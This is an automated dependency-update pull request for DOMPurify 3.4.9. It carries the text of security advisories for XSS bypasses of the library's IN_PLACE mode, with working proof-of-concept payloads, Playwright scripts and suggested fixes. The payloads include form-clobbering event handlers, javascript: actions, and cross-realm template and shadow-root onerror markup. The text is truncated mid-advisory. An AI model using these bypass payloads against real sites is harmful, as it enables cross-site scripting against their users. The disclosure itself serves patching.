chore(deps): update dependency dompurify to v3.4.9 [security]

[renovate]

ℹ️ Note

This PR body was truncated due to platform limits.

This PR contains the following updates:

Package	Change	Age	Confidence
dompurify	3.4.5 → 3.4.9

---

DOMPurify: IN_PLACE mode preserves attributes of a clobbered root element, allowing XSS via attacker-controlled root DOM

CVE-2026-49459 / GHSA-r47g-fvhr-h676

More information

Details

IN_PLACE mode preserves attributes of a clobbered root element, allowing XSS via attacker-controlled root DOM

CWE: CWE-79 (XSS — Improper Neutralization of Input During Web Page Generation) via CWE-693 (Protection Mechanism Failure — silent no-op when _forceRemove is called on a parent-less node)

Summary

When DOMPurify.sanitize(root, { IN_PLACE: true }) is called and root is a <form> whose own attributes carry an event handler (onmouseover, onfocus, onclick, etc.), a single descendant element with a name= attribute matching any of the property names _isClobbered checks (nodeName, setAttribute, namespaceURI, insertBefore, hasChildNodes, childNodes) is sufficient to bypass attribute sanitization on the root. _forceRemove silently no-ops because the root has no parent; the iterator drives on to _sanitizeAttributes, which early-returns on clobbered nodes — and the event handler attribute is never inspected. The sanitized return is the same root, with the handler live.

This affects current main at 89da34e (the just-landed DOM-clobbering hardening fix at 89da34e addressed _sanitizeAttachedShadowRoots walk traversal, not the main _sanitizeElements / _sanitizeAttributes pipeline against the iterator-root node).

Affected

• DOMPurify ≤ 3.4.5, including main at 89da34e03ec17868e561f87f3747a9371b61a9e7
• Any caller that does DOMPurify.sanitize(node, { IN_PLACE: true }) where node is built from untrusted HTML (e.g., parsed via createElement('template').innerHTML = dirty then template.content.firstElementChild handed in)

Not affected:

• String-input DOMPurify.sanitize(dirtyString) — the library builds the DOM itself inside _initDocument, the root is the cleanly-created document body, and clobber-named children of the body cannot shadow body named properties (HTMLBodyElement does not carry [LegacyOverrideBuiltIns])
• IN_PLACE where the root is not an HTMLFormElement
• IN_PLACE where the attacker cannot place a clobber-named child inside the root

Vulnerability details

Code paths

[A] — _forceRemove at src/purify.ts:930-939:

const _forceRemove = function (node: Node): void {
  arrayPush(DOMPurify.removed, { element: node });
  try {
    // eslint-disable-next-line unicorn/prefer-dom-node-remove
    getParentNode(node).removeChild(node);   // [A1] throws when getParentNode returns null
  } catch (_) {
    remove(node);                             // [A2] WebIDL Node.remove() — spec-defined no-op
  }                                           //      when the node has no parent
};

When the iterator-root has no parent (the standard IN_PLACE case where the caller hands in a detached node), getParentNode(node) returns null, null.removeChild(node) throws, the catch falls to remove(node) — which per WebIDL is Element.prototype.remove.call(node), and per spec does nothing if the node has no parent. Nothing about _forceRemove's contract acknowledges this — the function appears to its callers as "the node is gone now," but the node is still in place.

[B] — _sanitizeAttributes at src/purify.ts:1490-1492:

const _sanitizeAttributes = function (currentNode: Element): void {
  _executeHooks(hooks.beforeSanitizeAttributes, currentNode, null);

  const { attributes } = currentNode;

  /* Check if we have attributes; if not we might have a text node */
  if (!attributes || _isClobbered(currentNode)) {
    return;                                   // [B] silently skips ALL attribute checks
  }                                           //     for clobbered nodes
  ...
};

The skip at [B] is deliberate — the intent is to avoid touching nodes the library has already decided to discard. The invariant the comment implies is "if _isClobbered, then _sanitizeElements already removed this node, so we will never reach _sanitizeAttributes on it." That invariant holds for every non-root node (their _forceRemove succeeds in detaching them), but fails for the iterator root in IN_PLACE mode.

The mismatch is between [A] and [B]: [A] assumes "removal" means the node will not be observed again, and [B] assumes any clobbered node it sees has already been removed. Neither holds for the iterator root. A correct guard would either make _forceRemove fail loudly on parent-less nodes (so the caller can bail out of IN_PLACE entirely) or have _sanitizeAttributes strip attributes from clobbered roots before returning.

Iterator call site

src/purify.ts:1850-1864 ignores the boolean return value of _sanitizeElements:

const nodeIterator = _createNodeIterator(IN_PLACE ? dirty : body);

while ((currentNode = nodeIterator.nextNode())) {
  _sanitizeElements(currentNode);       // returns `true` if killed — IGNORED
  _sanitizeAttributes(currentNode);     // runs unconditionally; relies on [B]'s skip
  ...
}

If the return value were checked and _sanitizeAttributes skipped when the node was "killed," the bug would not exist as a discrete issue — but currently _sanitizeAttributes is the only line of defense for a node that _sanitizeElements could not actually detach.

Why the clobber works

In Chromium/WebKit/Firefox, HTMLFormElement carries the WebIDL [LegacyOverrideBuiltIns] extended attribute on its named-property getter. A descendant element with name="X" (or id="X", for radio-button-like names) shadows the matching property on the form, including properties inherited from Element, Node, and EventTarget prototypes. This is the same primitive the just-landed 89da34e fix addresses for shadow-root traversal, but _isClobbered's typeof checks (and the bypass-by-detection-failure path here) are independent of that fix.

Verified clobber targets (each name= value independently triggers _isClobbered):

name= value	property _isClobbered checks	typeof on clobbered form
nodeName	typeof element.nodeName !== 'string'	object (an <INPUT>)
setAttribute	typeof element.setAttribute !== 'function'	object (not callable) — but <embed>/<applet>/<iframe> ARE callable; see "Note on callable elements" below
namespaceURI	typeof element.namespaceURI !== 'string'	object
insertBefore	typeof element.insertBefore !== 'function'	object
hasChildNodes	typeof element.hasChildNodes !== 'function'	object
childNodes	!(element.childNodes && typeof element.childNodes.length === 'number')	object — <INPUT> has no .length
attributes	!(element.attributes instanceof NamedNodeMap)	object (an <INPUT> is not a NamedNodeMap)
textContent	typeof element.textContent !== 'string'	object
removeChild	typeof element.removeChild !== 'function'	object (non-callable)
removeAttribute	typeof element.removeAttribute !== 'function'	object (non-callable)

Any single one of the ten property names in _isClobbered's checklist is sufficient as the bypass trigger.

Proof of concept

(1) Minimal — runnable in a single browser context

<!doctype html>
<html><body>
<script src="dist/purify.js"></script>
<script>
  const root = document.createElement('form');
  root.setAttribute('onmouseover', 'window.__rooted = 1');
  const clobber = document.createElement('input');
  clobber.setAttribute('name', 'nodeName');
  root.appendChild(clobber);

  // typeof root.nodeName === 'object' (an <INPUT> element), not 'string'.
  // _isClobbered fires; _forceRemove(root) becomes a no-op because root.parentNode === null.
  DOMPurify.sanitize(root, { IN_PLACE: true });

  console.log('output:', root.outerHTML);
  // <form onmouseover="window.__rooted = 1"><input name="nodeName"></form>
  //  ^^^^^^^^^^^^^^^^^^ event handler survived ^^^^^^^^^^^^^^^^^^

  document.body.appendChild(root);
  root.dispatchEvent(new MouseEvent('mouseover', { bubbles: true }));
  console.log('handler fired:', window.__rooted === 1);  // true
</script>
</body></html>

(2) End-to-end — Playwright against main HEAD

const { chromium } = require('playwright');
const path = require('path');

(async () => {
  const browser = await chromium.launch();
  const page = await browser.newPage();
  await page.setContent('<!doctype html><html><body></body></html>');
  await page.addScriptTag({ path: path.resolve('dist/purify.js') });

  const result = await page.evaluate(() => {
    const root = document.createElement('form');
    root.setAttribute('onmouseover', 'window.__rooted = 1');
    const clobber = document.createElement('input');
    clobber.setAttribute('name', 'nodeName');
    root.appendChild(clobber);

    DOMPurify.sanitize(root, { IN_PLACE: true });

    document.body.appendChild(root);
    window.__rooted = 0;
    root.dispatchEvent(new MouseEvent('mouseover', { bubbles: true }));

    return {
      version: DOMPurify.version,
      output: root.outerHTML,
      handlerFired: window.__rooted === 1,
    };
  });
  console.log(result);
  await browser.close();
})();

Observed (Chromium 148.0.7778.96, DOMPurify 3.4.5, HEAD 89da34e):

{
  version: '3.4.5',
  output: '<form onmouseover="window.__rooted = 1"><input name="nodeName"></form>',
  handlerFired: true
}

(3) Variant matrix — six distinct clobber-target properties

Every property name in _isClobbered's typeof checklist works as the bypass trigger:

[BYPASS] name="nodeName"      → <form onmouseover="…"><input></form>
[BYPASS] name="setAttribute"  → <form onmouseover="…"><input></form>
[BYPASS] name="namespaceURI"  → <form onmouseover="…"><input></form>
[BYPASS] name="insertBefore"  → <form onmouseover="…"><input></form>
[BYPASS] name="hasChildNodes" → <form onmouseover="…"><input></form>
[BYPASS] name="childNodes"    → <form onmouseover="…"><input></form>

This makes the fix less of a one-line patch — every property _isClobbered checks for the typeof-spoofing pattern needs to be considered.

Impact

Direct

Two distinct impact paths from the same root-attribute-survival primitive:

(a) XSS via event-handler attribute on the surviving root. Any consumer that uses DOMPurify.sanitize(node, { IN_PLACE: true }) where node originated from untrusted HTML and is re-inserted into the live document is vulnerable to XSS. The typical pattern is:

const t = document.createElement('template');
t.innerHTML = untrustedHtml;
DOMPurify.sanitize(t.content.firstElementChild, { IN_PLACE: true });
container.appendChild(t.content.firstElementChild);

If untrustedHtml is <form onmouseover=…><input name=nodeName>…</form>, the resulting node has the onmouseover attribute intact when re-inserted into the live document.

(b) Every attribute-level defense is bypassed on the surviving root, not just event handlers. The _sanitizeAttributes early-return at :1490 skips the entire attribute walk for clobbered nodes, so the root preserves attributes that the attribute walk would otherwise sanitize. Verified additional attributes that survive:

• action="javascript:..." and formaction="javascript:..." — URI validation at :1413 never runs. A user click on a submit button inside the sanitized form navigates to the javascript: URL, executing the handler. Adds a click-triggered XSS path on top of the mouseover/focus event-handler attributes already documented.
• id="<colliding-name>" — the DOM-clobbering guard at :1352-1359 (SANITIZE_DOM && (lcName === 'id' || lcName === 'name') && (value in document || value in formElement)) lives inside _sanitizeAttributes and is skipped. An attacker can therefore land id="cookie", id="body", id="head", id="firstChild", etc. on the surviving form root and use it as a DOM-clobbering primitive against any consumer code that does document.cookie, document.body, etc.
• target="_top", autofocus, formenctype, formmethod — all survive untouched.
• Custom event handlers DOMPurify wouldn't have explicit list entries for (e.g., newly-spec'd oncontentvisibilityautostatechange) survive on the clobbered root via the same skip; the per-name allow-list at :1361-1364 never runs.

Verified — full attribute set survives on a single payload (PoC):

const root = document.createElement('form');
root.setAttribute('action', 'javascript:alert(1)');
root.setAttribute('target', '_top');
root.setAttribute('onclick', 'alert(2)');
root.setAttribute('onmouseover', 'alert(3)');
root.setAttribute('autofocus', '');
root.setAttribute('formaction', 'javascript:alert(4)');
root.setAttribute('id', 'cookie');           // DOM-clobbering primitive
root.innerHTML += '<input name="nodeName">';
DOMPurify.sanitize(root, { IN_PLACE: true });
console.log(root.outerHTML);
// <form action="javascript:alert(1)" target="_top" onclick="alert(2)"
//       onmouseover="alert(3)" autofocus="" formaction="javascript:alert(4)"
//       id="cookie"><input></form>

(c) Defense-in-depth re-sanitization on the same node is INEFFECTIVE — the clobber is sticky. Chromium's HTMLFormElement named-property cache appears to retain the named child reference even after the child's name attribute is removed during the sanitization pass. Empirically verified — after the first sanitize pass, the input's name="nodeName" attribute is correctly stripped (the output shows <input> with no attributes), yet typeof form.nodeName === 'object' is still true and the input element is still returned. Calling DOMPurify.sanitize(sameNode, { IN_PLACE: true }) a second time hits the same _isClobbered → _forceRemove → _sanitizeAttributes early-return path. The only effective recovery is serialize-then-reparse:

const root = parseAttackerHtml();                                     // form with input name="nodeName" child
DOMPurify.sanitize(root, { IN_PLACE: true });                         // bypass: attrs survive
DOMPurify.sanitize(root, { IN_PLACE: true });                         // STILL bypassed: attrs survive
const recovered = (() => {
  const t = document.createElement('template');
  t.innerHTML = root.outerHTML;                                       // forces a fresh parse
  const r = t.content.firstElementChild;
  DOMPurify.sanitize(r, { IN_PLACE: true });
  return r;
})();
// recovered.outerHTML === '<form><input></form>'  ← finally clean

A "belt-and-suspenders" caller that re-runs DOMPurify on its own output is therefore not protected against this primitive on Chromium; the obvious mitigation pattern fails silently. Any user-side workaround needs to route through a string round-trip.

(d) SAFE_FOR_TEMPLATES bypass for the root's attributes. When the caller sets SAFE_FOR_TEMPLATES: true to defend a downstream template engine (Vue, Angular, Liquid, Handlebars, …) from receiving `` / <%…%> / `${…}` syntax through DOMPurify's output, attribute-level template-syntax stripping runs in the same `_sanitizeAttributes` pass that early-returns on clobbered roots (`:1572-1576`). The root's attributes therefore retain raw template syntax that the downstream engine then evaluates.

Verified — same PoC structure, with SAFE_FOR_TEMPLATES: true:

const root = document.createElement('form');
root.setAttribute('title', '');
root.setAttribute('onmouseover', 'window.__x=1');
const c = document.createElement('input');
c.setAttribute('name', 'nodeName');
root.appendChild(c);

DOMPurify.sanitize(root, { IN_PLACE: true, SAFE_FOR_TEMPLATES: true });

console.log(root.outerHTML);
// <form title="" onmouseover="window.__x=1"><input></form>
//        ^^^^^^^^^^^^^^^^ template syntax survives

This compounds with (a): a single payload exfiltrates via XSS (immediate) and via SSTI to downstream renderers (delayed).

(Text-node content inside the form is still scrubbed correctly — _scrubTemplateExpressions at :1868-1870 walks text/comment/CDATA/PI nodes independently and reaches them via the iterator. Only attribute values on the clobbered root escape.)

Indirect / second-order

• DOM-based template systems / editors that wrap DOMPurify with an IN_PLACE call for parsed user content (CMSes, comment widgets, WYSIWYG editors persisting structured HTML).
• Email/HTML preview libraries that pre-parse received HTML before sanitization for performance reasons.
• Frameworks that hand DOMPurify a node tree rather than a string — including, indirectly, any code path that does el.innerHTML = …; DOMPurify.sanitize(el, { IN_PLACE: true }). The outer el is fine (it's not the form), but if the first child of el is taken as the sanitization root in a different code path, the bypass triggers.

Why current main is also vulnerable

Commit 89da34e ("fix: fixed a possible DOM clobbering with IN_PLACE and shadow DOM") hardens _sanitizeAttachedShadowRoots via three new cached prototype getters (getShadowRoot, getNodeName, getNodeType) and an _isClobbered extension that checks element.childNodes.length. The fix is correct for its scope — shadow-root traversal — but does not change _forceRemove's parent-less-node behavior or _sanitizeAttributes's clobber-skip early-return. The bypass demonstrated here is in the IN_PLACE main pipeline, not the shadow-root walk, and the verification PoC above runs against HEAD 89da34e and still succeeds.

Suggested fix

Two minimal-risk options:

1. Make _forceRemove honest about failure: return whether the node was actually detached, and have the iterator call site honor that.

   const _forceRemove = function (node: Node): boolean {
     arrayPush(DOMPurify.removed, { element: node });
     try {
       getParentNode(node).removeChild(node);
       return true;
     } catch (_) {
       try { remove(node); } catch (_) {}
       return node.parentNode === null && /* but still attached to itself */ false;
     }
   };

   Then at :1855, if _sanitizeElements returns true AND IN_PLACE, force-strip all attributes of the root before returning the dirty tree. (This is what the user expects — sanitization either succeeds or refuses to return a "sanitized" handle to an unsanitized tree.)

2. Strip attributes inside _sanitizeAttributes for clobbered roots: when _isClobbered(currentNode) is true at :1490, instead of early-returning, iterate currentNode.attributes (using the cached getAttributes if you add one) and remove each via removeAttribute. This preserves the existing semantics for non-root clobbered nodes (their attributes-of-a-removed-node will be GC'd anyway) and removes the attack surface for root.

3. Refuse IN_PLACE on parent-less clobbered roots: at the top of the iterator, check that the root either has a parent OR is not _isClobbered. If both fail, throw. This is the most defensive option but breaks any existing caller that hands in a clobbered detached root expecting "sanitized = empty/safe."

Note on callable elements

In Chromium and WebKit, HTMLEmbedElement, HTMLAppletElement, HTMLIFrameElement, and HTMLScriptElement have typeof === 'function' because they expose plugin/iframe [[Call]] traps at the WebIDL level. A name="setAttribute" child of one of these tags spoofs the setAttribute typeof === 'function' check — but only matters for the attribute re-set path at :1619, not the bypass demonstrated here (which uses nodeName and friends). The callable-element vector is worth checking separately as a potential SAFE_FOR_TEMPLATES-bypass primitive; the present report does not depend on it.

Severity

• CVSS Score: 6.1 / 10 (Medium)
• Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

References

• https://github.com/cure53/DOMPurify/security/advisories/GHSA-r47g-fvhr-h676
• https://github.com/advisories/GHSA-r47g-fvhr-h676

This data is provided by the GitHub Advisory Database (CC-BY 4.0).

---

DOMPurify: Cross-realm IN_PLACE sanitization leaves executable markup intact via realm-bound instanceof checks

CVE-2026-49458 / GHSA-hpcv-96wg-7vj8

More information

Details

Cross-realm IN_PLACE sanitization leaves executable markup intact via realm-bound instanceof checks

CWE: CWE-79 (XSS — Improper Neutralization of Input During Web Page Generation) via CWE-693 (Protection Mechanism Failure — realm-bound instanceof checks fail-open on foreign-realm DOM nodes) and CWE-501 (Trust Boundary Violation — foreign-realm nodes accepted for sanitization but later checks are bound to the parent realm)

Summary

DOMPurify.sanitize(node, { IN_PLACE: true }) accepts a DOM node from any same-origin realm (e.g. a node owned by an application-created iframe document), but several follow-on security checks compare the node against constructors from the parent realm. Because constructors are per-realm, instanceof HTMLFormElement, instanceof NamedNodeMap, instanceof DocumentFragment, and instanceof Element all return false for nodes belonging to the iframe's realm. The library therefore proceeds as if the foreign-realm form is not clobberable, the foreign-realm <template>'s .content is not a document fragment, and the foreign-realm attached shadow root is not a document fragment — silently skipping the clobber/template-content/shadow-DOM sanitization branches that those checks gate. Attacker-controlled markup survives in form attributes, template content, and attached shadow roots, and executes when the application later inserts or activates the sanitized node.

Affected

• DOMPurify ≤ 3.4.5, including main at 89da34e03ec17868e561f87f3747a9371b61a9e7
• Any caller that constructs or parses untrusted DOM in a same-origin iframe (or any other same-origin realm — popup window, opened tab, programmatically-created <iframe srcdoc>) and then calls DOMPurify.sanitize(foreignNode, { IN_PLACE: true }) against a sanitizer instance bound to a different realm

Not affected:

• String-input DOMPurify.sanitize(dirtyString) — the library calls its own parser inside _initDocument, the resulting nodes belong to the sanitizer's own realm, and the instanceof checks resolve as expected
• IN_PLACE calls where the input node was created in the same realm as the DOMPurify instance

Vulnerability details

The unifying defect is that _isClobbered, _sanitizeShadowDOM's template-content recursion, and _sanitizeAttachedShadowRoots all use realm-bound instanceof checks against the parent-realm constructors. Each branch fails-open for foreign-realm objects.

[A] — _isClobbered gates on element instanceof HTMLFormElement

src/purify.ts:1120-1140:

const _isClobbered = function (element: Element): boolean {
  return (
    element instanceof HTMLFormElement &&    // [A] realm-bound — false for any
                                              //     iframe-realm <form> element
    (typeof element.nodeName !== 'string' ||
      typeof element.textContent !== 'string' ||
      typeof element.removeChild !== 'function' ||
      !(element.attributes instanceof NamedNodeMap) ||   // [A'] also realm-bound
      typeof element.removeAttribute !== 'function' ||
      typeof element.setAttribute !== 'function' ||
      typeof element.namespaceURI !== 'string' ||
      typeof element.insertBefore !== 'function' ||
      typeof element.hasChildNodes !== 'function' ||
      !(element.childNodes && typeof element.childNodes.length === 'number'))
  );
};

A foreign-realm <form> is an instance of the foreign realm's HTMLFormElement, not the parent realm's. The leading instanceof short-circuits to false, so _isClobbered returns false regardless of the named-property clobbering present on the form. The follow-on _sanitizeAttributes then iterates currentNode.attributes — which itself can be a clobbered value (a foreign-realm <input> whose name="attributes" shadows the form's real NamedNodeMap). The attribute walk traverses the wrong collection and never reaches the actual onmouseover / onclick / action=javascript: attributes on the form root.

[B] — _sanitizeShadowDOM gates template recursion on content instanceof DocumentFragment

src/purify.ts:1660-1662:

while ((shadowNode = shadowIterator.nextNode())) {
  ...
  _sanitizeElements(shadowNode);
  _sanitizeAttributes(shadowNode);
  /* Deep shadow DOM detected */
  if (shadowNode.content instanceof DocumentFragment) {   // [B] realm-bound
    _sanitizeShadowDOM(shadowNode.content);
  }
}

The same check exists in the main iterator at :1861-1862:

if (currentNode.content instanceof DocumentFragment) {     // [B'] realm-bound
  _sanitizeShadowDOM(currentNode.content);
}

For a <template> element constructed in a foreign realm, template.content is a DocumentFragment from that realm — not from the parent realm. Both checks miss it, and the template's contents (which carry attacker-controlled <img src=x onerror=...> etc.) are never walked. The sanitized output appears clean from the outside, but the moment a consumer does node.cloneNode(true) / importNode(template.content, true) / inserts it into the live DOM, the embedded handler fires.

[C] — _sanitizeAttachedShadowRoots gates recursion on sr instanceof DocumentFragment

src/purify.ts:1702-1712:

if (nodeType === NODE_TYPE.element) {
  const sr = getShadowRoot
    ? getShadowRoot(root)
    : (root as Element).shadowRoot;
  if (sr instanceof DocumentFragment) {                    // [C] realm-bound
    _sanitizeAttachedShadowRoots(sr);
    _sanitizeShadowDOM(sr);
  }
}

For a host element constructed in a foreign realm with host.attachShadow({mode:'open'}), host.shadowRoot is a foreign-realm ShadowRoot (which extends the foreign realm's DocumentFragment). The instanceof DocumentFragment against the parent realm fails. The whole shadow subtree is skipped. When the host is later attached to the live document, the shadow DOM activates with attacker-controlled content.

The mismatch

DOMPurify accepts foreign-realm nodes for sanitization (the entry-point's _isNode(dirty) at :1750 is realm-agnostic — it checks shape, not constructor identity), so callers reasonably expect that the library's downstream defenses are equally realm-agnostic. They are not. [A] / [B] / [C] each fail-open for foreign-realm objects. A correct guard at each of those sites would use a realm-independent shape check (e.g., nodeType === 11 for DocumentFragment, tag-name comparison for HTMLFormElement recognition).

Proof of concept

Each PoC creates the attacker payload in a same-origin iframe, then calls the parent-realm DOMPurify.sanitize(node, { IN_PLACE: true }) and verifies that handler execution succeeds on subsequent activation.

PoC 1 — cross-realm form clobbering survives

const iframe = document.createElement('iframe');
iframe.srcdoc = '<!doctype html><html><body></body></html>';
iframe.onload = () => {
  const idoc = iframe.contentDocument;
  const div = idoc.createElement('div'); div.id = 'dirty';
  const form = idoc.createElement('form');
  form.setAttribute('onmouseover',
    'window.parent.__dompurify_xss=(window.parent.__dompurify_xss||0)+1');
  const inp = idoc.createElement('input');
  inp.setAttribute('name', 'attributes');                  // clobbers form.attributes
  form.appendChild(inp);
  div.appendChild(form);

  DOMPurify.sanitize(div, { IN_PLACE: true });

  window.__dompurify_xss = 0;
  document.body.appendChild(div);
  form.dispatchEvent(new MouseEvent('mouseover', { bubbles: true }));
  // window.__dompurify_xss === 1
};
document.body.appendChild(iframe);

Observed (Chromium 148, DOMPurify 3.4.5, HEAD 89da34e):

{
  "sanitizeError": null,
  "before": {
    "formIsMainRealmHTMLFormElement": false,
    "formIsForeignRealmHTMLFormElement": true,
    "formAttributesType": "[object HTMLInputElement]",
    "formAttributesEqualsInput": true
  },
  "after": {
    "html": "<div id=\"dirty\"><form onmouseover=\"window.parent.__dompurify_xss=(window.parent.__dompurify_xss||0)+1\"><input></form></div>",
    "formOnmouseover": "window.parent.__dompurify_xss=(window.parent.__dompurify_xss||0)+1",
    "xssExecuted": 1
  }
}

PoC 2 — cross-realm <template> content is never walked

const iframe = document.createElement('iframe');
iframe.srcdoc = '<!doctype html><html><body></body></html>';
iframe.onload = () => {
  const idoc = iframe.contentDocument;
  const div = idoc.createElement('div');
  const tpl = idoc.createElement('template');
  tpl.innerHTML = '<img src="x" onerror=' +
    '"window.parent.__dompurify_template_xss=(window.parent.__dompurify_template_xss||0)+1">';
  div.appendChild(tpl);

  DOMPurify.sanitize(div, { IN_PLACE: true });

  window.__dompurify_template_xss = 0;
  const clone = idoc.importNode(tpl.content, true);
  document.body.appendChild(clone);                        // fires onerror
};
document.body.appendChild(iframe);

Observed:

{
  "before": {
    "templateIsMainRealmHTMLTemplateElement": false,
    "contentIsMainRealmDocumentFragment": false,
    "contentIsForeignRealmDocumentFragment": true
  },
  "after": {
    "templateInnerHTMLAfter": "<img src=\"x\" onerror=\"window.parent.__dompurify_template_xss=(window.parent.__dompurify_template_xss||0)+1\">",
    "xssExecuted": 1
  }
}

PoC 3 — cross-realm attached shadow root is never walked

const iframe = document.createElement('iframe');
iframe.srcdoc = '<!doctype html><html><body></body></html>';
iframe.onload = () => {
  const idoc = iframe.contentDocument;
  const host = idoc.createElement('div');
  host.attachShadow({ mode: 'open' }).innerHTML =
    '<img src=x onerror="window.parent.__dompurify_shadow_xss=(window.parent.__dompurify_shadow_xss||0)+1"><b>safe text</b>';

  DOMPurify.sanitize(host, { IN_PLACE: true });

  window.__dompurify_shadow_xss = 0;
  document.body.appendChild(host);                          // shadow activates, onerror fires
};
document.body.appendChild(iframe);

Observed:

{
  "before": {
    "hostIsMainRealmElement": false,
    "shadowRootIsMainRealmDocumentFragment": false,
    "shadowRootIsForeignRealmDocumentFragment": true
  },
  "after": {
    "shadowRootInnerHTMLAfter": "<img src=\"x\" onerror=\"window.parent.__dompurify_shadow_xss=(window.parent.__dompurify_shadow_xss||0)+1\"><b>safe text</b>",
    "xssExecuted": 1
  }
}

All three PoCs run cleanly against dist/purify.js built from current main HEAD 89da34e.

Impact

Direct

Any application that parses, isolates, or constructs untrusted DOM inside a same-origin iframe (a common technique for <base href> isolation, document.write sandboxing, layout pre-measurement, declarative-shadow-root attachment, etc.) and then hands the resulting node to a parent-realm DOMPurify instance with IN_PLACE: true is vulnerable. The library returns a node whose top-level shape looks sanitized, but executable attacker markup remains in:

• Form root attributes — onmouseover, onfocus, onclick, action="javascript:...", formaction=, target=, id= (DOM-clobbering target), and the full attribute-allowlist set, because _sanitizeAttributes walks a clobbered .attributes instead of the real NamedNodeMap.
• <template> content — <img onerror>, <svg><script>, <iframe srcdoc>, etc., because the inert template tree is never recursed into.
• Attached shadow roots — any markup inside the shadow root, because the shadow walk is skipped entirely.

XSS triggers when the consuming code:

• Inserts the form into the live DOM and the user interacts with it (mouseover, click, focus).
• Clones template content with importNode / cloneNode(true) / node.appendChild(template.content) into the live DOM.
• Appends the shadow host to the live document (the shadow root becomes active and <img onerror> fires synchronously during the insertion microtask).

Indirect / second-order

• DOM-based template engines (Lit, Polymer, Vue, FAST) that often use foreign-realm <template> parsing for performance reasons. If they pipe attacker-influenced content through such a template and then run DOMPurify on the parent-realm host, the template body is sanitization-skipped.
• Editor / WYSIWYG frameworks that render preview content inside a same-origin iframe and then move it into the main document after sanitization.
• Email/HTML preview libraries that parse received HTML in an isolated iframe to neutralize CSS / <base> / form submission, then sanitize via the main page's DOMPurify.
• Declarative shadow DOM consumers that adopt a host from one realm into another — the shadow subtree carries the bypass.

The known prior IN_PLACE-cross-window fix (which closed an earlier cross-window primitive) does not cover the realm-bound instanceof checks at [A], [B], [C]; current main HEAD is still affected.

Root cause

Per-realm constructors. instanceof X checks the prototype chain against the parent realm's X.prototype. Foreign-realm objects have a different X.prototype and so fail every such check. The sanitizer accepts foreign-realm DOM nodes for IN_PLACE sanitization (the entry-point only checks node shape), but several internal security decisions are still bound to the parent realm. This produces an inconsistency: "we accept your node, but we silently behave as if it is not a form, not a template, not a shadow root."

Other realm-bound instanceof sites in the same file that should likely be audited as part of the same fix sweep:

element instanceof HTMLFormElement     // src/purify.ts:1122
element.attributes instanceof NamedNodeMap  // src/purify.ts:1126
sr instanceof DocumentFragment         // src/purify.ts:1706
currentNode.content instanceof DocumentFragment  // src/purify.ts:1861
shadowNode.content instanceof DocumentFragment   // src/purify.ts:1660 (approx)
currentNode instanceof Element         // src/purify.ts:1296 (callsite of _checkValidNamespace)

Suggested fix

Use realm-independent shape checks consistently for any decision made on a node accepted from IN_PLACE:

1. HTMLFormElement detection — compare via the realm-independent getNodeName cached prototype getter introduced for the recent shadow-root traversal hardening:

   const _isClobbered = function (element: Element): boolean {
     const nn = getNodeName ? getNodeName(element) : element.nodeName;
     if (typeof nn !== 'string' || transformCaseFunc(nn) !== 'form') return false;
     // ... rest of the typeof / cached-getter shape checks ...
   };

2. DocumentFragment detection — nodeType === NODE_TYPE.documentFragment (i.e., 11), not instanceof DocumentFragment. The check is already realm-independent because Node.nodeType is a numeric constant. Same change for the <template>-content and attached-shadow-root recursion sites.

3. NamedNodeMap detection — read element.attributes via the cached Element.prototype.attributes getter (introduce getAttributes = lookupGetter(ElementPrototype, 'attributes')) and verify nodeType === 11-style shape (length is a number, indexed [i] returns objects with .name/.value strings). Do not rely on instanceof NamedNodeMap.

4. Element detection at :1296 — replace currentNode instanceof Element with a shape check (getNodeType(currentNode) === NODE_TYPE.element).

The invariant the fix should encode: once IN_PLACE accepts a foreign-realm node for sanitization, every downstream security decision on that node must be foreign-realm-safe. The cached prototype getters introduced for the shadow-root hardening already point at the right pattern; the fix is to extend that pattern to every realm-bound check in the sanitization path.

Severity

• CVSS Score: 6.1 / 10 (Medium)
• Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

References

• https://github.com/cure53/DOMPurify/security/advisories/GHSA-hpcv-96wg-7vj8
• https://github.com/advisories/GHSA-hpcv-96wg-7vj8

This data is provided by the GitHub Advisory Database (CC-BY 4.0).

---

DOMPurify: Hook mutation of data.allowedTags / data.allowedAttributes permanently pollutes DEFAULT_ALLOWED_TAGS / DEFAULT_ALLOWED_ATTR

GHSA-76mc-f452-cxcm

More information

Details

Hook mutation of data.allowedTags / data.allowedAttributes permanently pollutes DEFAULT_ALLOWED_TAGS / DEFAULT_ALLOWED_ATTR

CWE: CWE-501 (Trust Boundary Violation — hook-scoped mutation leaks to global default sets) via CWE-693 (Protection Mechanism Failure — the default allow-list is silently widened for all subsequent sanitize calls)

Summary

The data.allowedTags and data.allowedAttributes fields passed to uponSanitizeElement and uponSanitizeAttribute hooks are direct references to the library's live ALLOWED_TAGS / ALLOWED_ATTR sets. For sanitize calls that don't supply an explicit cfg.ALLOWED_TAGS / cfg.ALLOWED_ATTR array, those live sets are themselves direct references to the module-level DEFAULT_ALLOWED_TAGS / DEFAULT_ALLOWED_ATTR constants. A hook that mutates these fields — a natural-looking pattern for "allow X for this iteration" — permanently writes new entries into the default constants for the DOMPurify instance's lifetime. Every subsequent sanitize call that doesn't override the config inherits the widened defaults, so an attacker payload that uses the poisoned tag/attribute name survives sanitization. removeAllHooks(), clearConfig(), and even passing a fresh cfg: {} do not recover; only constructing a new DOMPurify instance does.

The maintainer's existing defense at src/purify.ts:696-700 explicitly clones DEFAULT_ALLOWED_TAGS before mutating it via cfg.ADD_TAGS (array form), demonstrating awareness of this exact class. The hook path remained uncovered.

Affected

• DOMPurify ≤ 3.4.5, including main at 7996f1dc78eb8b7922388aed75d94a9f8fad9a36
• Any application that installs a hook on uponSanitizeElement or uponSanitizeAttribute that writes to data.allowedTags[...] = true or data.allowedAttributes[...] = true and later sanitizes attacker-influenced content with default config (no explicit cfg.ALLOWED_TAGS / cfg.ALLOWED_ATTR array)

Vulnerability details

[A] — data.allowedTags is a reference to ALLOWED_TAGS

src/purify.ts:1206-1209:

_executeHooks(hooks.uponSanitizeElement, currentNode, {
  tagName,
  allowedTags: ALLOWED_TAGS,         // [A] direct reference; hook mutation
                                      //     mutates the very ALLOWED_TAGS the
                                      //     library checks on the next element
});

src/purify.ts:1494-1500 (the matching attribute hook):

const hookEvent = {
  attrName: '',
  attrValue: '',
  keepAttr: true,
  allowedAttributes: ALLOWED_ATTR,    // [A'] same pattern
  forceKeepAttr: undefined,
};

[B] — ALLOWED_TAGS = DEFAULT_ALLOWED_TAGS for default-cfg sanitize calls

